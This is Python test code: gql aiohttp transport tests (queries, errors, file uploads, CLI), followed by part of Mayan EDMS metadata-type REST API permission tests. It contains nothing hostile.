query1_server_answer_data = (
'{"continents":['
'{"code":"AF","name":"Africa"},{"code":"AN","name":"Antarctica"},'
'{"code":"AS","name":"Asia"},{"code":"EU","name":"Europe"},'
'{"code":"NA","name":"North America"},{"code":"OC","name":"Oceania"},'
'{"code":"SA","name":"South America"}]}'
)
query1_server_answer = f'{{"data":{query1_server_answer_data}}}'
# Marking all tests in this file with the aiohttp marker
pytestmark = pytest.mark.aiohttp
@pytest.mark.asyncio
async def test_aiohttp_query(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
return web.Response(
text=query1_server_answer,
content_type="application/json",
headers={"dummy": "test1234"},
)
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url, timeout=10)
async with Client(transport=transport) as session:
query = gql(query1_str)
# Execute query asynchronously
result = await session.execute(query)
continents = result["continents"]
africa = continents[0]
assert africa["code"] == "AF"
# Checking response headers are saved in the transport
assert hasattr(transport, "response_headers")
assert isinstance(transport.response_headers, Mapping)
assert transport.response_headers["dummy"] == "test1234"
@pytest.mark.asyncio
async def test_aiohttp_ignore_backend_content_type(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
return web.Response(text=query1_server_answer, content_type="text/plain")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url, timeout=10)
async with Client(transport=transport) as session:
query = gql(query1_str)
result = await session.execute(query)
continents = result["continents"]
africa = continents[0]
assert africa["code"] == "AF"
@pytest.mark.asyncio
async def test_aiohttp_cookies(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
assert "COOKIE" in request.headers
assert "cookie1=val1" == request.headers["COOKIE"]
return web.Response(text=query1_server_answer, content_type="application/json")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url, cookies={"cookie1": "val1"})
async with Client(transport=transport) as session:
query = gql(query1_str)
# Execute query asynchronously
result = await session.execute(query)
continents = result["continents"]
africa = continents[0]
assert africa["code"] == "AF"
@pytest.mark.asyncio
async def test_aiohttp_error_code_401(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
# Will generate http error code 401
return web.Response(
text='{"error":"Unauthorized","message":"401 Client Error: Unauthorized"}',
content_type="application/json",
status=401,
)
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url)
async with Client(transport=transport) as session:
query = gql(query1_str)
with pytest.raises(TransportServerError) as exc_info:
await session.execute(query)
assert "401, message='Unauthorized'" in str(exc_info.value)
@pytest.mark.asyncio
async def test_aiohttp_error_code_500(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
# Will generate http error code 500
raise Exception("Server error")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url)
async with Client(transport=transport) as session:
query = gql(query1_str)
with pytest.raises(TransportServerError) as exc_info:
await session.execute(query)
assert "500, message='Internal Server Error'" in str(exc_info.value)
query1_server_error_answer = '{"errors": ["Error 1", "Error 2"]}'
@pytest.mark.asyncio
async def test_aiohttp_error_code(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
return web.Response(
text=query1_server_error_answer, content_type="application/json"
)
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url)
async with Client(transport=transport) as session:
query = gql(query1_str)
with pytest.raises(TransportQueryError):
await session.execute(query)
invalid_protocol_responses = [
{
"response": "{}",
"expected_exception": (
"Server did not return a GraphQL result: "
'No "data" or "errors" keys in answer: {}'
),
},
{
"response": "qlsjfqsdlkj",
"expected_exception": (
"Server did not return a GraphQL result: Not a JSON answer: qlsjfqsdlkj"
),
},
{
"response": '{"not_data_or_errors": 35}',
"expected_exception": (
"Server did not return a GraphQL result: "
'No "data" or "errors" keys in answer: {"not_data_or_errors": 35}'
),
},
]
@pytest.mark.asyncio
@pytest.mark.parametrize("param", invalid_protocol_responses)
async def test_aiohttp_invalid_protocol(event_loop, aiohttp_server, param):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
response = param["response"]
async def handler(request):
return web.Response(text=response, content_type="application/json")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url)
async with Client(transport=transport) as session:
query = gql(query1_str)
with pytest.raises(TransportProtocolError) as exc_info:
await session.execute(query)
assert param["expected_exception"] in str(exc_info.value)
@pytest.mark.asyncio
async def test_aiohttp_subscribe_not_supported(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
return web.Response(text="does not matter", content_type="application/json")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url)
async with Client(transport=transport) as session:
query = gql(query1_str)
with pytest.raises(NotImplementedError):
async for result in session.subscribe(query):
pass
@pytest.mark.asyncio
async def test_aiohttp_cannot_connect_twice(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
return web.Response(text=query1_server_answer, content_type="application/json")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url, timeout=10)
async with Client(transport=transport) as session:
with pytest.raises(TransportAlreadyConnected):
await session.transport.connect()
@pytest.mark.asyncio
async def test_aiohttp_cannot_execute_if_not_connected(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
return web.Response(text=query1_server_answer, content_type="application/json")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url, timeout=10)
query = gql(query1_str)
with pytest.raises(TransportClosed):
await transport.execute(query)
@pytest.mark.asyncio
async def test_aiohttp_extra_args(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
return web.Response(text=query1_server_answer, content_type="application/json")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
# passing extra arguments to aiohttp.ClientSession
from aiohttp import DummyCookieJar
jar = DummyCookieJar()
transport = AIOHTTPTransport(
url=url, timeout=10, client_session_args={"version": "1.1", "cookie_jar": jar}
)
async with Client(transport=transport) as session:
query = gql(query1_str)
# Passing extra arguments to the post method of aiohttp
result = await session.execute(query, extra_args={"allow_redirects": False})
continents = result["continents"]
africa = continents[0]
assert africa["code"] == "AF"
query2_str = """
query getEurope ($code: ID!) {
continent (code: $code) {
name
}
}
"""
query2_server_answer = '{"data": {"continent": {"name": "Europe"}}}'
@pytest.mark.asyncio
async def test_aiohttp_query_variable_values(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
return web.Response(text=query2_server_answer, content_type="application/json")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url, timeout=10)
async with Client(transport=transport) as session:
params = {"code": "EU"}
query = gql(query2_str)
# Execute query asynchronously
result = await session.execute(
query, variable_values=params, operation_name="getEurope"
)
continent = result["continent"]
assert continent["name"] == "Europe"
@pytest.mark.asyncio
async def test_aiohttp_query_variable_values_fix_issue_292(event_loop, aiohttp_server):
"""Allow to specify variable_values without keyword.
See https://github.com/graphql-python/gql/issues/292"""
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
return web.Response(text=query2_server_answer, content_type="application/json")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url, timeout=10)
async with Client(transport=transport) as session:
params = {"code": "EU"}
query = gql(query2_str)
# Execute query asynchronously
result = await session.execute(query, params, operation_name="getEurope")
continent = result["continent"]
assert continent["name"] == "Europe"
@pytest.mark.asyncio
async def test_aiohttp_execute_running_in_thread(
event_loop, aiohttp_server, run_sync_test
):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
return web.Response(text=query1_server_answer, content_type="application/json")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
def test_code():
transport = AIOHTTPTransport(url=url)
client = Client(transport=transport)
query = gql(query1_str)
client.execute(query)
await run_sync_test(event_loop, server, test_code)
@pytest.mark.asyncio
async def test_aiohttp_subscribe_running_in_thread(
event_loop, aiohttp_server, run_sync_test
):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
return web.Response(text=query1_server_answer, content_type="application/json")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
def test_code():
transport = AIOHTTPTransport(url=url)
client = Client(transport=transport)
query = gql(query1_str)
# Note: subscriptions are not supported on the aiohttp transport
# But we add this test in order to have 100% code coverage
# It is to check that we will correctly set an event loop
# in the subscribe function if there is none (in a Thread for example)
# We cannot test this with the websockets transport because
# the websockets transport will set an event loop in its init
with pytest.raises(NotImplementedError):
for result in client.subscribe(query):
pass
await run_sync_test(event_loop, server, test_code)
file_upload_server_answer = '{"data":{"success":true}}'
file_upload_mutation_1 = """
mutation($file: Upload!) {
uploadFile(input:{other_var:$other_var, file:$file}) {
success
}
}
"""
file_upload_mutation_1_operations = (
'{"query": "mutation ($file: Upload!) {\\n uploadFile(input: {other_var: '
'$other_var, file: $file}) {\\n success\\n }\\n}", "variables": '
'{"file": null, "other_var": 42}}'
)
file_upload_mutation_1_map = '{"0": ["variables.file"]}'
file_1_content = """
This is a test file
This file will be sent in the GraphQL mutation
"""
async def single_upload_handler(request):
from aiohttp import web
reader = await request.multipart()
field_0 = await reader.next()
assert field_0.name == "operations"
field_0_text = await field_0.text()
assert field_0_text == file_upload_mutation_1_operations
field_1 = await reader.next()
assert field_1.name == "map"
field_1_text = await field_1.text()
assert field_1_text == file_upload_mutation_1_map
field_2 = await reader.next()
assert field_2.name == "0"
field_2_text = await field_2.text()
assert field_2_text == file_1_content
field_3 = await reader.next()
assert field_3 is None
return web.Response(text=file_upload_server_answer, content_type="application/json")
@pytest.mark.asyncio
async def test_aiohttp_file_upload(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
app = web.Application()
app.router.add_route("POST", "/", single_upload_handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url, timeout=10)
with TemporaryFile(file_1_content) as test_file:
async with Client(transport=transport) as session:
query = gql(file_upload_mutation_1)
file_path = test_file.filename
with open(file_path, "rb") as f:
params = {"file": f, "other_var": 42}
# Execute query asynchronously
result = await session.execute(
query, variable_values=params, upload_files=True
)
success = result["success"]
assert success
@pytest.mark.asyncio
async def test_aiohttp_file_upload_without_session(
event_loop, aiohttp_server, run_sync_test
):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
app = web.Application()
app.router.add_route("POST", "/", single_upload_handler)
server = await aiohttp_server(app)
url = server.make_url("/")
def test_code():
transport = AIOHTTPTransport(url=url, timeout=10)
with TemporaryFile(file_1_content) as test_file:
client = Client(transport=transport)
query = gql(file_upload_mutation_1)
file_path = test_file.filename
with open(file_path, "rb") as f:
params = {"file": f, "other_var": 42}
result = client.execute(
query, variable_values=params, upload_files=True
)
success = result["success"]
assert success
await run_sync_test(event_loop, server, test_code)
# This is a sample binary file content containing all possible byte values
binary_file_content = bytes(range(0, 256))
async def binary_upload_handler(request):
from aiohttp import web
reader = await request.multipart()
field_0 = await reader.next()
assert field_0.name == "operations"
field_0_text = await field_0.text()
assert field_0_text == file_upload_mutation_1_operations
field_1 = await reader.next()
assert field_1.name == "map"
field_1_text = await field_1.text()
assert field_1_text == file_upload_mutation_1_map
field_2 = await reader.next()
assert field_2.name == "0"
field_2_binary = await field_2.read()
assert field_2_binary == binary_file_content
field_3 = await reader.next()
assert field_3 is None
return web.Response(text=file_upload_server_answer, content_type="application/json")
@pytest.mark.asyncio
async def test_aiohttp_binary_file_upload(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
app = web.Application()
app.router.add_route("POST", "/", binary_upload_handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url, timeout=10)
with TemporaryFile(binary_file_content) as test_file:
async with Client(transport=transport) as session:
query = gql(file_upload_mutation_1)
file_path = test_file.filename
with open(file_path, "rb") as f:
params = {"file": f, "other_var": 42}
# Execute query asynchronously
result = await session.execute(
query, variable_values=params, upload_files=True
)
success = result["success"]
assert success
@pytest.mark.asyncio
async def test_aiohttp_stream_reader_upload(event_loop, aiohttp_server):
from aiohttp import web, ClientSession
from gql.transport.aiohttp import AIOHTTPTransport
async def binary_data_handler(request):
return web.Response(
body=binary_file_content, content_type="binary/octet-stream"
)
app = web.Application()
app.router.add_route("POST", "/", binary_upload_handler)
app.router.add_route("GET", "/binary_data", binary_data_handler)
server = await aiohttp_server(app)
url = server.make_url("/")
binary_data_url = server.make_url("/binary_data")
transport = AIOHTTPTransport(url=url, timeout=10)
async with Client(transport=transport) as session:
query = gql(file_upload_mutation_1)
async with ClientSession() as client:
async with client.get(binary_data_url) as resp:
params = {"file": resp.content, "other_var": 42}
# Execute query asynchronously
result = await session.execute(
query, variable_values=params, upload_files=True
)
success = result["success"]
assert success
@pytest.mark.asyncio
async def test_aiohttp_async_generator_upload(event_loop, aiohttp_server):
import aiofiles
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
app = web.Application()
app.router.add_route("POST", "/", binary_upload_handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url, timeout=10)
with TemporaryFile(binary_file_content) as test_file:
async with Client(transport=transport) as session:
query = gql(file_upload_mutation_1)
file_path = test_file.filename
async def file_sender(file_name):
async with aiofiles.open(file_name, "rb") as f:
chunk = await f.read(64 * 1024)
while chunk:
yield chunk
chunk = await f.read(64 * 1024)
params = {"file": file_sender(file_path), "other_var": 42}
# Execute query asynchronously
result = await session.execute(
query, variable_values=params, upload_files=True
)
success = result["success"]
assert success
file_upload_mutation_2 = """
mutation($file1: Upload!, $file2: Upload!) {
uploadFile(input:{file1:$file, file2:$file}) {
success
}
}
"""
file_upload_mutation_2_operations = (
'{"query": "mutation ($file1: Upload!, $file2: Upload!) {\\n '
'uploadFile(input: {file1: $file, file2: $file}) {\\n success\\n }\\n}", '
'"variables": {"file1": null, "file2": null}}'
)
file_upload_mutation_2_map = '{"0": ["variables.file1"], "1": ["variables.file2"]}'
file_2_content = """
This is a second test file
This file will also be sent in the GraphQL mutation
"""
@pytest.mark.asyncio
async def test_aiohttp_file_upload_two_files(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
reader = await request.multipart()
field_0 = await reader.next()
assert field_0.name == "operations"
field_0_text = await field_0.text()
assert field_0_text == file_upload_mutation_2_operations
field_1 = await reader.next()
assert field_1.name == "map"
field_1_text = await field_1.text()
assert field_1_text == file_upload_mutation_2_map
field_2 = await reader.next()
assert field_2.name == "0"
field_2_text = await field_2.text()
assert field_2_text == file_1_content
field_3 = await reader.next()
assert field_3.name == "1"
field_3_text = await field_3.text()
assert field_3_text == file_2_content
field_4 = await reader.next()
assert field_4 is None
return web.Response(
text=file_upload_server_answer, content_type="application/json"
)
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url, timeout=10)
with TemporaryFile(file_1_content) as test_file_1:
with TemporaryFile(file_2_content) as test_file_2:
async with Client(transport=transport) as session:
query = gql(file_upload_mutation_2)
file_path_1 = test_file_1.filename
file_path_2 = test_file_2.filename
f1 = open(file_path_1, "rb")
f2 = open(file_path_2, "rb")
params = {
"file1": f1,
"file2": f2,
}
result = await session.execute(
query, variable_values=params, upload_files=True
)
f1.close()
f2.close()
success = result["success"]
assert success
file_upload_mutation_3 = """
mutation($files: [Upload!]!) {
uploadFiles(input:{files:$files}) {
success
}
}
"""
file_upload_mutation_3_operations = (
'{"query": "mutation ($files: [Upload!]!) {\\n uploadFiles(input: {files: $files})'
' {\\n success\\n }\\n}", "variables": {"files": [null, null]}}'
)
file_upload_mutation_3_map = '{"0": ["variables.files.0"], "1": ["variables.files.1"]}'
@pytest.mark.asyncio
async def test_aiohttp_file_upload_list_of_two_files(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
reader = await request.multipart()
field_0 = await reader.next()
assert field_0.name == "operations"
field_0_text = await field_0.text()
assert field_0_text == file_upload_mutation_3_operations
field_1 = await reader.next()
assert field_1.name == "map"
field_1_text = await field_1.text()
assert field_1_text == file_upload_mutation_3_map
field_2 = await reader.next()
assert field_2.name == "0"
field_2_text = await field_2.text()
assert field_2_text == file_1_content
field_3 = await reader.next()
assert field_3.name == "1"
field_3_text = await field_3.text()
assert field_3_text == file_2_content
field_4 = await reader.next()
assert field_4 is None
return web.Response(
text=file_upload_server_answer, content_type="application/json"
)
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url, timeout=10)
with TemporaryFile(file_1_content) as test_file_1:
with TemporaryFile(file_2_content) as test_file_2:
async with Client(transport=transport) as session:
query = gql(file_upload_mutation_3)
file_path_1 = test_file_1.filename
file_path_2 = test_file_2.filename
f1 = open(file_path_1, "rb")
f2 = open(file_path_2, "rb")
params = {"files": [f1, f2]}
# Execute query asynchronously
result = await session.execute(
query, variable_values=params, upload_files=True
)
f1.close()
f2.close()
success = result["success"]
assert success
@pytest.mark.asyncio
async def test_aiohttp_using_cli(event_loop, aiohttp_server, monkeypatch, capsys):
from aiohttp import web
async def handler(request):
return web.Response(text=query1_server_answer, content_type="application/json")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = str(server.make_url("/"))
parser = get_parser(with_examples=True)
args = parser.parse_args([url, "--verbose"])
# Monkeypatching sys.stdin to simulate getting the query
# via the standard input
monkeypatch.setattr("sys.stdin", io.StringIO(query1_str))
exit_code = await main(args)
assert exit_code == 0
# Check that the result has been printed on stdout
captured = capsys.readouterr()
captured_out = str(captured.out).strip()
expected_answer = json.loads(query1_server_answer_data)
print(f"Captured: {captured_out}")
received_answer = json.loads(captured_out)
assert received_answer == expected_answer
@pytest.mark.asyncio
async def test_aiohttp_using_cli_invalid_param(
event_loop, aiohttp_server, monkeypatch, capsys
):
from aiohttp import web
async def handler(request):
return web.Response(text=query1_server_answer, content_type="application/json")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = str(server.make_url("/"))
parser = get_parser(with_examples=True)
args = parser.parse_args([url, "--variables", "invalid_param"])
# Monkeypatching sys.stdin to simulate getting the query
# via the standard input
monkeypatch.setattr("sys.stdin", io.StringIO(query1_str))
# Check that the exit_code is an error
exit_code = await main(args)
assert exit_code == 1
# Check that the error has been printed on stdout
captured = capsys.readouterr()
captured_err = str(captured.err).strip()
print(f"Captured: {captured_err}")
expected_error = "Error: Invalid variable: invalid_param"
assert expected_error in captured_err
@pytest.mark.asyncio
async def test_aiohttp_using_cli_invalid_query(
event_loop, aiohttp_server, monkeypatch, capsys
):
from aiohttp import web
async def handler(request):
return web.Response(text=query1_server_answer, content_type="application/json")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = str(server.make_url("/"))
parser = get_parser(with_examples=True)
args = parser.parse_args([url])
# Send invalid query on standard input
monkeypatch.setattr("sys.stdin", io.StringIO("BLAHBLAH"))
exit_code = await main(args)
assert exit_code == 1
# Check that the error has been printed on stdout
captured = capsys.readouterr()
captured_err = str(captured.err).strip()
print(f"Captured: {captured_err}")
expected_error = "Syntax Error: Unexpected Name 'BLAHBLAH'"
assert expected_error in captured_err
query1_server_answer_with_extensions = (
f'{{"data":{query1_server_answer_data}, "extensions":{{"key1": "val1"}}}}'
)
@pytest.mark.asyncio
async def test_aiohttp_query_with_extensions(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
return web.Response(
text=query1_server_answer_with_extensions, content_type="application/json"
)
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url, timeout=10)
async with Client(transport=transport) as session:
query = gql(query1_str)
execution_result = await session.execute(query, get_execution_result=True)
assert execution_result.extensions["key1"] == "val1"
@pytest.mark.asyncio
@pytest.mark.parametrize("ssl_close_timeout", [0, 10])
async def test_aiohttp_query_https(event_loop, ssl_aiohttp_server, ssl_close_timeout):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
return web.Response(text=query1_server_answer, content_type="application/json")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await ssl_aiohttp_server(app)
url = server.make_url("/")
assert str(url).startswith("https://")
transport = AIOHTTPTransport(
url=url, timeout=10, ssl_close_timeout=ssl_close_timeout
)
async with Client(transport=transport) as session:
query = gql(query1_str)
# Execute query asynchronously
result = await session.execute(query)
continents = result["continents"]
africa = continents[0]
assert africa["code"] == "AF"
| 28.024242 | 88 | 0.662908 | 3,899 | 32,368 | 5.298538 | 0.079508 | 0.03398 | 0.024687 | 0.028075 | 0.812914 | 0.785033 | 0.757249 | 0.750617 | 0.723849 | 0.702503 | 0 | 0.013779 | 0.233193 | 32,368 | 1,154 | 89 | 28.048527 | 0.818574 | 0.042604 | 0 | 0.698499 | 0 | 0.002729 | 0.117498 | 0.019032 | 0 | 0 | 0 | 0 | 0.084584 | 1 | 0.004093 | false | 0.002729 | 0.085948 | 0 | 0.122783 | 0.004093 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ab06e11725f4013f0d30102b4fd8953a0baac5a4 | 22,441 | py | Python | mayan/apps/metadata/tests/test_api.py | Syunkolee9891/Mayan-EDMS | 3759a9503a264a180b74cc8518388f15ca66ac1a | [
"Apache-2.0"
] | 1 | 2021-06-17T18:24:25.000Z | 2021-06-17T18:24:25.000Z | mayan/apps/metadata/tests/test_api.py | Syunkolee9891/Mayan-EDMS | 3759a9503a264a180b74cc8518388f15ca66ac1a | [
"Apache-2.0"
] | 7 | 2020-06-06T00:01:04.000Z | 2022-01-13T01:47:17.000Z | mayan/apps/metadata/tests/test_api.py | Syunkolee9891/Mayan-EDMS | 3759a9503a264a180b74cc8518388f15ca66ac1a | [
"Apache-2.0"
] | null | null | null | from __future__ import unicode_literals
from rest_framework import status
from mayan.apps.documents.permissions import (
permission_document_type_edit, permission_document_type_view
)
from mayan.apps.documents.tests import DocumentTestMixin
from mayan.apps.rest_api.tests import BaseAPITestCase
from ..models import DocumentTypeMetadataType, MetadataType
from ..permissions import (
permission_document_metadata_add, permission_document_metadata_edit,
permission_document_metadata_remove, permission_document_metadata_view,
permission_metadata_type_create, permission_metadata_type_delete,
permission_metadata_type_edit, permission_metadata_type_view
)
from .literals import TEST_METADATA_VALUE, TEST_METADATA_VALUE_EDITED
from .mixins import MetadataTypeAPIViewTestMixin, MetadataTypeTestMixin
class MetadataTypeAPITestCase(
MetadataTypeAPIViewTestMixin, MetadataTypeTestMixin, BaseAPITestCase
):
def test_metadata_type_create_no_permission(self):
response = self._request_test_metadata_type_create_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(MetadataType.objects.count(), 0)
def test_metadata_type_create_with_permission(self):
self.grant_permission(permission=permission_metadata_type_create)
response = self._request_test_metadata_type_create_view()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
metadata_type = MetadataType.objects.first()
self.assertEqual(response.data['id'], metadata_type.pk)
def _request_test_metadata_type_delete_view(self):
return self.delete(
viewname='rest_api:metadatatype-detail',
kwargs={'metadata_type_pk': self.test_metadata_type.pk}
)
def test_metadata_type_delete_no_access(self):
self._create_test_metadata_type()
response = self._request_test_metadata_type_delete_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(MetadataType.objects.count(), 1)
def test_metadata_type_delete_with_access(self):
self._create_test_metadata_type()
self.grant_access(
obj=self.test_metadata_type, permission=permission_metadata_type_delete
)
response = self._request_test_metadata_type_delete_view()
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.assertEqual(MetadataType.objects.count(), 0)
def _request_metadata_type_detail_view(self):
return self.get(
viewname='rest_api:metadatatype-detail',
kwargs={'metadata_type_pk': self.test_metadata_type.pk}
)
def test_metadata_type_detail_view_no_access(self):
self._create_test_metadata_type()
response = self._request_metadata_type_detail_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_metadata_type_detail_view_with_access(self):
self._create_test_metadata_type()
self.grant_access(
obj=self.test_metadata_type, permission=permission_metadata_type_view
)
response = self._request_metadata_type_detail_view()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
response.data['label'], self.test_metadata_type.label
)
def _request_test_metadata_type_edit_view_via_patch(self):
return self.patch(
viewname='rest_api:metadatatype-detail',
kwargs={'metadata_type_pk': self.test_metadata_type.pk}, data={
'label': '{} edited'.format(self.test_metadata_type.label),
'name': '{}_edited'.format(self.test_metadata_type.name),
}
)
def test_metadata_type_patch_view_no_access(self):
self._create_test_metadata_type()
metadata_type_values = self._model_instance_to_dictionary(
instance=self.test_metadata_type
)
response = self._request_test_metadata_type_edit_view_via_patch()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.test_metadata_type.refresh_from_db()
self.assertEqual(
self._model_instance_to_dictionary(
instance=self.test_metadata_type
), metadata_type_values
)
def test_metadata_type_patch_view_with_access(self):
self._create_test_metadata_type()
metadata_type_values = self._model_instance_to_dictionary(
instance=self.test_metadata_type
)
self.grant_access(
obj=self.test_metadata_type, permission=permission_metadata_type_edit
)
response = self._request_test_metadata_type_edit_view_via_patch()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.test_metadata_type.refresh_from_db()
self.assertNotEqual(
self._model_instance_to_dictionary(
instance=self.test_metadata_type
), metadata_type_values
)
def _request_test_metadata_type_edit_view_via_put(self):
return self.put(
viewname='rest_api:metadatatype-detail',
kwargs={'metadata_type_pk': self.test_metadata_type.pk}, data={
'label': '{} edited'.format(self.test_metadata_type.label),
'name': '{}_edited'.format(self.test_metadata_type.name),
}
)
def test_metadata_type_put_view_no_access(self):
self._create_test_metadata_type()
metadata_type_values = self._model_instance_to_dictionary(
instance=self.test_metadata_type
)
response = self._request_test_metadata_type_edit_view_via_put()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.test_metadata_type.refresh_from_db()
self.assertEqual(
self._model_instance_to_dictionary(
instance=self.test_metadata_type
), metadata_type_values
)
def test_metadata_type_put_view_with_access(self):
self._create_test_metadata_type()
metadata_type_values = self._model_instance_to_dictionary(
instance=self.test_metadata_type
)
self.grant_access(
obj=self.test_metadata_type,
permission=permission_metadata_type_edit
)
response = self._request_test_metadata_type_edit_view_via_put()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.test_metadata_type.refresh_from_db()
self.assertNotEqual(
self._model_instance_to_dictionary(
instance=self.test_metadata_type
), metadata_type_values
)
def _request_metadata_type_list_view(self):
return self.get(viewname='rest_api:metadatatype-list')
def test_metadata_type_list_view_no_access(self):
self._create_test_metadata_type()
response = self._request_metadata_type_list_view()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data['count'], 0)
def test_metadata_type_list_view_with_access(self):
self._create_test_metadata_type()
self.grant_access(
obj=self.test_metadata_type,
permission=permission_metadata_type_view
)
response = self._request_metadata_type_list_view()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
response.data['results'][0]['label'],
self.test_metadata_type.label
)
class DocumentTypeMetadataTypeAPITestCase(
DocumentTestMixin, MetadataTypeTestMixin, BaseAPITestCase
):
auto_upload_document = False
def setUp(self):
super(DocumentTypeMetadataTypeAPITestCase, self).setUp()
self._create_test_metadata_type()
def _create_document_type_metadata_type(self):
self.test_document_type_metadata_type = self.test_document_type.metadata.create(
metadata_type=self.test_metadata_type, required=False
)
def _request_document_type_metadata_type_create_view(self):
return self.post(
viewname='rest_api:documenttypemetadatatype-list',
kwargs={'document_type_pk': self.test_document_type.pk}, data={
'metadata_type_pk': self.test_metadata_type.pk, 'required': False
}
)
def test_document_type_metadata_type_create_view_no_access(self):
response = self._request_document_type_metadata_type_create_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(self.test_document_type.metadata.count(), 0)
def test_document_type_metadata_type_create_view_with_access(self):
self.grant_access(
obj=self.test_document_type,
permission=permission_document_type_edit
)
response = self._request_document_type_metadata_type_create_view()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
